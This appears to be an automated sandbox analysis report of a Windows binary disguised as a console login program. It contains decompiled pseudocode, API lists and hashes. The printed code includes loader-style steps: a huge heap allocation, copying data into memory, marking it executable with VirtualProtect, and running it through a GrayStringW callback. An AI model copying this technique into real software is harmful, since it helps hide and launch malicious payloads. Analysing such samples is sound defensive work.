                                                                      					L14:
                                                                      					__eflags = 0;
                                                                      					return 0;
                                                                      				}
                                                                      				E00BE22F0(_t174, _t175, _t182);
                                                                      				goto L14;
                                                                      			}

























                                                                      0x00be1040
                                                                      0x00be1040
                                                                      0x00be1040
                                                                      0x00be1040
                                                                      0x00be1048
                                                                      0x00be1058
                                                                      0x00be105b
                                                                      0x00be106e
                                                                      0x00be107f
                                                                      0x00be1098
                                                                      0x00be10b1
                                                                      0x00be10c2
                                                                      0x00be10d1
                                                                      0x00be10dd
                                                                      0x00be10f0
                                                                      0x00be10f5
                                                                      0x00be10f8
                                                                      0x00be110a
                                                                      0x00be1121
                                                                      0x00be1134
                                                                      0x00be113e
                                                                      0x00be1148
                                                                      0x00be1152
                                                                      0x00be115c
                                                                      0x00be1165
                                                                      0x00be1177
                                                                      0x00be1183
                                                                      0x00be118c
                                                                      0x00be1196
                                                                      0x00be119f
                                                                      0x00be11a8
                                                                      0x00be11b2
                                                                      0x00be11bb
                                                                      0x00be11c5
                                                                      0x00be11d8
                                                                      0x00be11e1
                                                                      0x00be11ea
                                                                      0x00be1107
                                                                      0x00be1107
                                                                      0x00be1208
                                                                      0x00be122b
                                                                      0x00be122e
                                                                      0x00be1233
                                                                      0x00be123b
                                                                      0x00be1244
                                                                      0x00be1249
                                                                      0x00be124e
                                                                      0x00be1253
                                                                      0x00be125a
                                                                      0x00be125d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be1263
                                                                      0x00be1266
                                                                      0x00be1273
                                                                      0x00be1276
                                                                      0x00be1281
                                                                      0x00be1281
                                                                      0x00be1278
                                                                      0x00be127c
                                                                      0x00be127f
                                                                      0x00be128c
                                                                      0x00be128f
                                                                      0x00be1293
                                                                      0x00be1293
                                                                      0x00be129d
                                                                      0x00be129f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be127f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be12a1
                                                                      0x00be12a1
                                                                      0x00be12a6
                                                                      0x00be12a6
                                                                      0x00be1268
                                                                      0x00000000

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE1052
                                                                        • Part of subcall function 00BE6B80: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6B8C
                                                                        • Part of subcall function 00BE6B80: RtlAllocateHeap.NTDLL(00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6B93
                                                                        • Part of subcall function 00BE6B80: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6BCD
                                                                        • Part of subcall function 00BE6B80: HeapAlloc.KERNEL32(00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6BD4
                                                                      • LoadLibraryW.KERNEL32(User32.dll,23FDEF72,?,0E0BAA99,?,B616C5D9,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE108C
                                                                      • LoadLibraryW.KERNEL32(User32.dll,695C9378,00000000,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE10A5
                                                                      • _memmove.LIBCMT ref: 00BE10F0
                                                                      • VirtualProtect.KERNELBASE(?,00001A05,00000040,?), ref: 00BE1208
                                                                      • GrayStringW.USER32(00000000), ref: 00BE122B
                                                                      • _wprintf.LIBCMT ref: 00BE124E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Heap$LibraryLoadProcess$AllocAllocateGrayHandleModuleProtectStringVirtual_memmove_wprintf
                                                                      • String ID: IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF$User32.dll$User32.dll
                                                                      • API String ID: 1383926253-1224953502
                                                                      • Opcode ID: f954d695283db7dfb245995c0aad2d76b1ecf9e57a90316d0abff58e71bd94d0
                                                                      • Instruction ID: d04631a79cb12dce8a9ce683d465f69e73169425001801cbdb94b3c02d7fc14a
                                                                      • Opcode Fuzzy Hash: f954d695283db7dfb245995c0aad2d76b1ecf9e57a90316d0abff58e71bd94d0
                                                                      • Instruction Fuzzy Hash: 6071AE70D4C2D8BADB01DBFA88917FDBFB09F16302F1484D9E591B6282CA75474ADB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 41%
                                                                      			E00BE6B80(void* __ecx) {
                                                                      				void* _v8;
                                                                      				void* _t5;
                                                                      				void* _t7;
                                                                      				void* _t14;
                                                                      
                                                                      				_t14 = __ecx;
                                                                      				_push(__ecx);
                                                                      				_t5 = RtlAllocateHeap(GetProcessHeap(), 1, 0x17d78400); // executed
                                                                      				_v8 = _t5;
                                                                      				_push(_t5);
                                                                      				if(_t5 != 0x11) {
                                                                      					asm("cld");
                                                                      				}
                                                                      				asm("clc");
                                                                      				_pop(_t7);
                                                                      				if(_v8 != 0) {
                                                                      					E00BE6C50(_t14, _v8, 0x17d78400);
                                                                      					_push(_t11);
                                                                      					asm("cld");
                                                                      					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
                                                                      				}
                                                                      				return _t7;
                                                                      			}







                                                                      0x00be6b80
                                                                      0x00be6b83
                                                                      0x00be6b93
                                                                      0x00be6b99
                                                                      0x00be6b9c
                                                                      0x00be6ba0
                                                                      0x00be6ba4
                                                                      0x00be6ba5
                                                                      0x00be6ba9
                                                                      0x00be6baa
                                                                      0x00be6baf
                                                                      0x00be6bbd
                                                                      0x00be6bc2
                                                                      0x00be6bc7
                                                                      0x00be6bd4
                                                                      0x00be6bd4
                                                                      0x00be6bde

                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6B8C
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6B93
                                                                      • GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6BCD
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,00BE1060,?,00BE89A2,00BE0000,00000000,00000000), ref: 00BE6BD4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocAllocate
                                                                      • String ID:
                                                                      • API String ID: 1154092256-0
                                                                      • Opcode ID: 378d23a1391dd610e2a12dc8761dbd8589bb7337e6c12385526f3420a4b8529c
                                                                      • Instruction ID: fe7596bf68533ac197e23db7ef44e7946579fa9e20057aeb973564640b7c01f0
                                                                      • Opcode Fuzzy Hash: 378d23a1391dd610e2a12dc8761dbd8589bb7337e6c12385526f3420a4b8529c
                                                                      • Instruction Fuzzy Hash: 2FF05E71541258BFEB0067B5AC4EBBFB7DCE705709FA00594F505D3250DE725E08C664
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                      				intOrPtr _t17;
                                                                      				intOrPtr _t23;
                                                                      				void* _t24;
                                                                      				void* _t25;
                                                                      				void* _t26;
                                                                      				intOrPtr _t28;
                                                                      				signed int _t38;
                                                                      				void* _t40;
                                                                      				void* _t46;
                                                                      				signed int _t49;
                                                                      				void* _t51;
                                                                      				void* _t53;
                                                                      				void* _t60;
                                                                      
                                                                      				_t60 = __fp0;
                                                                      				_t47 = __edi;
                                                                      				_t46 = __edx;
                                                                      				E00BEFC48();
                                                                      				_push(0x14);
                                                                      				_push(0xbfd838);
                                                                      				E00BE9160(__ebx, __edi, __esi);
                                                                      				_t49 = E00BEC013() & 0x0000ffff;
                                                                      				E00BEFBFB(2);
                                                                      				_t53 =  *0xbe0000 - 0x5a4d; // 0x5a4d
                                                                      				if(_t53 == 0) {
                                                                      					_t17 =  *0xbe003c; // 0xf0
                                                                      					__eflags =  *((intOrPtr*)(_t17 + 0xbe0000)) - 0x4550;
                                                                      					if( *((intOrPtr*)(_t17 + 0xbe0000)) != 0x4550) {
                                                                      						goto L2;
                                                                      					} else {
                                                                      						__eflags =  *((intOrPtr*)(_t17 + 0xbe0018)) - 0x10b;
                                                                      						if( *((intOrPtr*)(_t17 + 0xbe0018)) != 0x10b) {
                                                                      							goto L2;
                                                                      						} else {
                                                                      							_t38 = 0;
                                                                      							__eflags =  *((intOrPtr*)(_t17 + 0xbe0074)) - 0xe;
                                                                      							if( *((intOrPtr*)(_t17 + 0xbe0074)) > 0xe) {
                                                                      								__eflags =  *(_t17 + 0xbe00e8);
                                                                      								_t6 =  *(_t17 + 0xbe00e8) != 0;
                                                                      								__eflags = _t6;
                                                                      								_t38 = 0 | _t6;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					L2:
                                                                      					_t38 = 0;
                                                                      				}
                                                                      				 *(_t51 - 0x1c) = _t38;
                                                                      				if(E00BED058() == 0) {
                                                                      					E00BE89F5(0x1c);
                                                                      				}
                                                                      				if(E00BED6D2(_t38, _t47) == 0) {
                                                                      					_t19 = E00BE89F5(0x10);
                                                                      				}
                                                                      				E00BEBE1F(_t19);
                                                                      				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
                                                                      				E00BEA5C3();
                                                                      				 *0xc04080 = GetCommandLineA(); // executed
                                                                      				_t23 = E00BEFCE2(); // executed
                                                                      				 *0xc02284 = _t23;
                                                                      				_t24 = E00BEF8ED();
                                                                      				_t56 = _t24;
                                                                      				if(_t24 < 0) {
                                                                      					E00BE751F(_t38, _t46, _t47, _t49, _t56, 8);
                                                                      				}
                                                                      				_t25 = E00BEFB1A(_t38, _t46, _t47, _t49);
                                                                      				_t57 = _t25;
                                                                      				if(_t25 < 0) {
                                                                      					E00BE751F(_t38, _t46, _t47, _t49, _t57, 9);
                                                                      				}
                                                                      				_t26 = E00BE7559(_t47, _t49, 1);
                                                                      				_pop(_t40);
                                                                      				_t58 = _t26;
                                                                      				if(_t26 != 0) {
                                                                      					E00BE751F(_t38, _t46, _t47, _t49, _t58, _t26);
                                                                      					_pop(_t40);
                                                                      				}
                                                                      				_t28 = E00BE1040(_t40, _t47, _t49, _t58, _t60, 0xbe0000, 0, E00BEFD6D(), _t49); // executed
                                                                      				_t50 = _t28;
                                                                      				 *((intOrPtr*)(_t51 - 0x24)) = _t28;
                                                                      				if(_t38 == 0) {
                                                                      					E00BE77B1(_t50);
                                                                      				}
                                                                      				E00BE754A();
                                                                      				 *(_t51 - 4) = 0xfffffffe;
                                                                      				return E00BE91A5(_t50);
                                                                      			}
















                                                                      0x00be88a7
                                                                      0x00be88a7
                                                                      0x00be88a7
                                                                      0x00be88a7
                                                                      0x00be88b1
                                                                      0x00be88b3
                                                                      0x00be88b8
                                                                      0x00be88c2
                                                                      0x00be88c7
                                                                      0x00be88d2
                                                                      0x00be88d9
                                                                      0x00be88df
                                                                      0x00be88e4
                                                                      0x00be88ee
                                                                      0x00000000
                                                                      0x00be88f0
                                                                      0x00be88f5
                                                                      0x00be88fc
                                                                      0x00000000
                                                                      0x00be88fe
                                                                      0x00be88fe
                                                                      0x00be8900
                                                                      0x00be8907
                                                                      0x00be8909
                                                                      0x00be890f
                                                                      0x00be890f
                                                                      0x00be890f
                                                                      0x00be890f
                                                                      0x00be8907
                                                                      0x00be88fc
                                                                      0x00be88db
                                                                      0x00be88db
                                                                      0x00be88db
                                                                      0x00be88db
                                                                      0x00be8912
                                                                      0x00be891c
                                                                      0x00be8920
                                                                      0x00be8925
                                                                      0x00be892d
                                                                      0x00be8931
                                                                      0x00be8936
                                                                      0x00be8937
                                                                      0x00be893c
                                                                      0x00be8940
                                                                      0x00be894b
                                                                      0x00be8950
                                                                      0x00be8955
                                                                      0x00be895a
                                                                      0x00be895f
                                                                      0x00be8961
                                                                      0x00be8965
                                                                      0x00be896a
                                                                      0x00be896b
                                                                      0x00be8970
                                                                      0x00be8972
                                                                      0x00be8976
                                                                      0x00be897b
                                                                      0x00be897e
                                                                      0x00be8983
                                                                      0x00be8984
                                                                      0x00be8986
                                                                      0x00be8989
                                                                      0x00be898e
                                                                      0x00be898e
                                                                      0x00be899d
                                                                      0x00be89a2
                                                                      0x00be89a4
                                                                      0x00be89a9
                                                                      0x00be89ac
                                                                      0x00be89ac
                                                                      0x00be89b1
                                                                      0x00be89e6
                                                                      0x00be89f4

                                                                      APIs
                                                                      • ___security_init_cookie.LIBCMT ref: 00BE88A7
                                                                        • Part of subcall function 00BEC013: GetStartupInfoW.KERNEL32(?), ref: 00BEC01D
                                                                      • _fast_error_exit.LIBCMT ref: 00BE8920
                                                                      • _fast_error_exit.LIBCMT ref: 00BE8931
                                                                      • __RTC_Initialize.LIBCMT ref: 00BE8937
                                                                      • __ioinit0.LIBCMT ref: 00BE8940
                                                                      • GetCommandLineA.KERNEL32(00BFD838,00000014), ref: 00BE8945
                                                                      • ___crtGetEnvironmentStringsA.LIBCMT ref: 00BE8950
                                                                      • __setargv.LIBCMT ref: 00BE895A
                                                                      • __setenvp.LIBCMT ref: 00BE896B
                                                                      • __cinit.LIBCMT ref: 00BE897E
                                                                      • __wincmdln.LIBCMT ref: 00BE898F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__ioinit0__setargv__setenvp__wincmdln
                                                                      • String ID:
                                                                      • API String ID: 1504447550-0
                                                                      • Opcode ID: 4ff3011b31dc53a600e388d210b8201e508794c930cd43f8e599d334ea0918a6
                                                                      • Instruction ID: 55dbaa0b73c66652ddc56418dce5393444aeea717b85f24049c6428a092f46dc
                                                                      • Opcode Fuzzy Hash: 4ff3011b31dc53a600e388d210b8201e508794c930cd43f8e599d334ea0918a6
                                                                      • Instruction Fuzzy Hash: EC21D634E44BC699DB207BF39856B3D21D4EF10711F2054E9FA09AB0D3DFB489809263
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      C-Code - Quality: 100%
                                                                      			E00BEC0A3(struct _EXCEPTION_POINTERS* _a4) {
                                                                      
                                                                      				SetUnhandledExceptionFilter(0);
                                                                      				return UnhandledExceptionFilter(_a4);
                                                                      			}



                                                                      0x00bec0a8
                                                                      0x00bec0b8

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BE8B1A,?,?,?,00000000), ref: 00BEC0A8
                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00BEC0B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 77688ba35ab29039a8c965baa1162a1413338ca8a10fb07851d8f484f80da43b
                                                                      • Instruction ID: a8228c7350435b0a85d8ad30187a7a04ac41677b914cf6c312126fd46cd6b2ef
                                                                      • Opcode Fuzzy Hash: 77688ba35ab29039a8c965baa1162a1413338ca8a10fb07851d8f484f80da43b
                                                                      • Instruction Fuzzy Hash: 19B09231044208FBCB002BA5FC0AB687F28EB08652F408010F60D470619F725511CAA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a2d2e04ea1aa673136b96ee0032c95a61923f652389f362a1ba10d5f402c527
                                                                      • Instruction ID: 3bb84e502407b4af7a1298ecd48d026a975034f22a571d8c96aa23878bb16980
                                                                      • Opcode Fuzzy Hash: 4a2d2e04ea1aa673136b96ee0032c95a61923f652389f362a1ba10d5f402c527
                                                                      • Instruction Fuzzy Hash: 1B321331D29F454DD7239635C922335A688AFB73C4F15D727E82AB6DAAEF28D4C38100
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00BEC080(_Unknown_base(*)()* _a4) {
                                                                      
                                                                      				return SetUnhandledExceptionFilter(_a4);
                                                                      			}



                                                                      0x00bec08d

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BEF78E,00BEF743,?,00000000,00000000,00000000,00000000), ref: 00BEC086
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 1bce4a338772286e5b4f236b8d039747bb966bb3e43661790f7eb145d5fd1f8c
                                                                      • Instruction ID: 086362b8f4c9e75d33927fd9cafbe7006a2ea7a71890e88b8ac67c60a033be99
                                                                      • Opcode Fuzzy Hash: 1bce4a338772286e5b4f236b8d039747bb966bb3e43661790f7eb145d5fd1f8c
                                                                      • Instruction Fuzzy Hash: B3A0113000020CAB8F002B8AEC0A8A83F2CEA082A0B000020F80C020208F22AA228A80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225784561.0000000000D4D000.00000040.00000001.sdmp, Offset: 00D4D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 528a4f16991854913c462da7ad73e791a05de82d13dc41471258f931d0ebd2d2
                                                                      • Instruction ID: 425dd621a92dffa60fd81cf428f76fb4faf346fec03ae255b35062822f907940
                                                                      • Opcode Fuzzy Hash: 528a4f16991854913c462da7ad73e791a05de82d13dc41471258f931d0ebd2d2
                                                                      • Instruction Fuzzy Hash: 8FE01A36264505EFCB54CBA8CD85D56B3E8EB19320B1446A0FD19C73A1DA34EE01DA60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225784561.0000000000D4D000.00000040.00000001.sdmp, Offset: 00D4D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                                                      • Instruction ID: d88a6462e79424bfb02ff5a86749a74241d94ef7b53735ece245ad39a8007773
                                                                      • Opcode Fuzzy Hash: ff5f89fbc0ecb4e9f42a23ab0e6ea761649b2aca3cc7db53e6fbbfb3471062a8
                                                                      • Instruction Fuzzy Hash: E3E04F362505149BC7219B99D800C97F7E8EF887B074A4435ED4997620D630FC02DBB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00BE6A00() {
                                                                      
                                                                      				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                                      			}



                                                                      0x00be6a17

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                      • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                      • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                      • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225784561.0000000000D4D000.00000040.00000001.sdmp, Offset: 00D4D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                      • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                      • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                      • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225784561.0000000000D4D000.00000040.00000001.sdmp, Offset: 00D4D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                                                      • Instruction ID: cae70606e93a790045589fd915a5ed31a12d121767183b443e581a4bd6c0b870
                                                                      • Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
                                                                      • Instruction Fuzzy Hash: 8AB092646114805AEB12C3248416B1176E0A740B01F8984E0A00A82D91C25C8984A210
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225784561.0000000000D4D000.00000040.00000001.sdmp, Offset: 00D4D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
                                                                      • Instruction ID: cb197d2559c09660318d3d12e6cb9f80cf1b08a2d0c32daa4285e7c7a95ab15a
                                                                      • Opcode Fuzzy Hash: 3f377ddc5f06dfc3153ea0c28b0a1464ef23ffe7e410e0425465c082cb6f6e04
                                                                      • Instruction Fuzzy Hash: ECA00179152A809BD7128B55D558B9476A4B748A44F9544A4D40546A51827C5504CE04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E00BE3610(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                      				char _v5;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v16;
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				char _v36;
                                                                      				char _v39;
                                                                      				char _v43;
                                                                      				char _v47;
                                                                      				char _v51;
                                                                      				char _v55;
                                                                      				char _v59;
                                                                      				char _v63;
                                                                      				char _v67;
                                                                      				char _v68;
                                                                      				char _v80;
                                                                      				char _v92;
                                                                      				char _v124;
                                                                      				char _v156;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t58;
                                                                      				intOrPtr _t60;
                                                                      				void* _t61;
                                                                      				void* _t98;
                                                                      				void* _t99;
                                                                      				void* _t108;
                                                                      				intOrPtr _t111;
                                                                      				void* _t121;
                                                                      				void* _t122;
                                                                      				void* _t123;
                                                                      				void* _t127;
                                                                      				void* _t128;
                                                                      				void* _t129;
                                                                      				void* _t130;
                                                                      				void* _t131;
                                                                      				void* _t139;
                                                                      				void* _t148;
                                                                      
                                                                      				_t148 = __fp0;
                                                                      				_t122 = __esi;
                                                                      				_t121 = __edi;
                                                                      				_t108 = __ebx;
                                                                      				_v68 = 0;
                                                                      				_v67 = 0;
                                                                      				_v63 = 0;
                                                                      				_v59 = 0;
                                                                      				_v55 = 0;
                                                                      				_v51 = 0;
                                                                      				_v47 = 0;
                                                                      				_v43 = 0;
                                                                      				_v39 = 0;
                                                                      				_v12 = 0;
                                                                      				_v20 = 0;
                                                                      				_v20 = 0;
                                                                      				do {
                                                                      					E00BE1380(_t121, _t122, 0, 0xa, 8, 0x46, 0xf);
                                                                      					E00BE12B0(7, 5);
                                                                      					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                                      					E00BE715C(_t108, _t121, _t122, 0);
                                                                      					E00BE12B0(0x17, 0xa);
                                                                      					_push("Enter User name : ");
                                                                      					E00BE715C(_t108, _t121, _t122, 0);
                                                                      					E00BE738B("%s", 0xc02ee4);
                                                                      					E00BE12B0(0x17, 0xc);
                                                                      					_push("Password        : ");
                                                                      					E00BE715C(_t108, _t121, _t122, 0);
                                                                      					_t127 = _t123 + 0x14;
                                                                      					E00BE12F0(_t121, _t122,  &_v68);
                                                                      					_v20 = _v20 + 1;
                                                                      					_t143 = _v20 - 3;
                                                                      					if(_v20 == 3) {
                                                                      						E00BE20E0( &_v68, _t121, _t122, _t143, _t148);
                                                                      						E00BE12B0(0x19, 0xa);
                                                                      						_push(0xbffb98);
                                                                      						E00BE715C(_t108, _t121, _t122, _t143);
                                                                      						E00BE12B0(0x16, 0xc);
                                                                      						_push("Press ENTER to exit the program...");
                                                                      						E00BE715C(_t108, _t121, _t122, _t143);
                                                                      						_t127 = _t127 + 8;
                                                                      						E00BE77B1(0);
                                                                      					}
                                                                      					_v12 = 0;
                                                                      					_t58 = E00BE6EF1("USER.DAT", "r");
                                                                      					_t128 = _t127 + 8;
                                                                      					 *0xc02f28 = _t58;
                                                                      					while(1) {
                                                                      						_push( &_v156);
                                                                      						_push( &_v124);
                                                                      						_t60 =  *0xc02f28; // 0x0
                                                                      						_t61 = E00BE7021(_t60, "%s %s %s\n",  &_v92);
                                                                      						_t129 = _t128 + 0x14;
                                                                      						if(_t61 == 0xffffffff) {
                                                                      							break;
                                                                      						}
                                                                      						_t98 = E00BE8230(0xc02ee4,  &_v124);
